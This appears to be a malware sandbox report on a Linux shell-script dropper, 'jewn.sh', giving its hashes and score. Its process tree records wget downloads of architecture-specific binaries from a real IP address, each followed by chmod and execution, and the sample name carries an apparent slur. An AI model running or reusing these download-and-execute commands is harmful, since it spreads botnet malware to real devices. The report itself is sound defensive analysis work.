fc888d0e281f668aa43f5b266eaf0f69edd56eb7c47d32a005de9ab268fc8645

Analysis

max time kernel
0s
max time network
127s
platform
debian-9_armhf
resource
debian9-armhf-20221111-en
resource tags

arch:armhfimage:debian9-armhf-20221111-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
08/02/2023, 06:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

jewn.sh
Size

1KB
MD5

2097bb27333c25ce9708e90de1604d99
SHA1

5e26a804a9ee8922e12e8eb3aab85cdd83235ebb
SHA256

fc888d0e281f668aa43f5b266eaf0f69edd56eb7c47d32a005de9ab268fc8645
SHA512

7417d2e7a5c2266038244ccf0c9efcc6007766e10221f8fc65f74bc5559e060d0d0ee771cd8eaaf9db5269d4cf1af84bc07f65dff60a89d64565a721dd64eb53

Score

5^/10

Malware Config

Signatures

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
/tmp/jewn.sh	/tmp/jewn.sh	jewn.sh

/tmp/jewn.sh
/tmp/jewn.sh
1⤵
- Writes file to tmp directory
PID:354
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.x86
  2⤵
  PID:355
- /bin/cat
  cat jew.x86
  2⤵
  PID:361
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-5c683f4029a0467c878ba6c06a121d49-systemd-timesyncd.service-DQHSvI
  2⤵
  PID:362
- ./jewn
  ./jewn
  2⤵
  PID:363
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.mips
  2⤵
  PID:365
- /bin/cat
  cat jew.mips
  2⤵
  PID:367
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-5c683f4029a0467c878ba6c06a121d49-systemd-timesyncd.service-DQHSvI
  2⤵
  PID:368
- ./jewn
  ./jewn
  2⤵
  PID:369
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.mpsl
  2⤵
  PID:371
- /bin/cat
  cat jew.mpsl
  2⤵
  PID:373
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-5c683f4029a0467c878ba6c06a121d49-systemd-timesyncd.service-DQHSvI
  2⤵
  PID:374
- ./jewn
  ./jewn
  2⤵
  PID:375
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.arm4
  2⤵
  PID:377
- /bin/cat
  cat jew.arm4
  2⤵
  PID:381
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-5c683f4029a0467c878ba6c06a121d49-systemd-timesyncd.service-DQHSvI
  2⤵
  PID:382
- ./jewn
  ./jewn
  2⤵
  PID:383
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.arm5
  2⤵
  PID:385
- /bin/cat
  cat jew.arm5
  2⤵
  PID:387
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-5c683f4029a0467c878ba6c06a121d49-systemd-timesyncd.service-DQHSvI
  2⤵
  PID:388
- ./jewn
  ./jewn
  2⤵
  PID:389
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.arm6
  2⤵
  PID:391
- /bin/cat
  cat jew.arm6
  2⤵
  PID:393
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-5c683f4029a0467c878ba6c06a121d49-systemd-timesyncd.service-DQHSvI
  2⤵
  PID:394
- ./jewn
  ./jewn
  2⤵
  PID:395
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.arm7
  2⤵
  PID:397
- /bin/cat
  cat jew.arm7
  2⤵
  PID:401
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-5c683f4029a0467c878ba6c06a121d49-systemd-timesyncd.service-DQHSvI
  2⤵
  PID:402
- ./jewn
  ./jewn
  2⤵
  PID:403
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.ppc
  2⤵
  PID:405
- /bin/cat
  cat jew.ppc
  2⤵
  PID:407
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-5c683f4029a0467c878ba6c06a121d49-systemd-timesyncd.service-DQHSvI
  2⤵
  PID:408
- ./jewn
  ./jewn
  2⤵
  PID:409
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.m68k
  2⤵
  PID:411
- /bin/cat
  cat jew.m68k
  2⤵
  PID:413
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-5c683f4029a0467c878ba6c06a121d49-systemd-timesyncd.service-DQHSvI
  2⤵
  PID:414
- ./jewn
  ./jewn
  2⤵
  PID:415
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.sh4
  2⤵
  PID:417
- /bin/cat
  cat jew.sh4
  2⤵
  PID:419
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-5c683f4029a0467c878ba6c06a121d49-systemd-timesyncd.service-DQHSvI
  2⤵
  PID:420
- ./jewn
  ./jewn
  2⤵
  PID:421

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads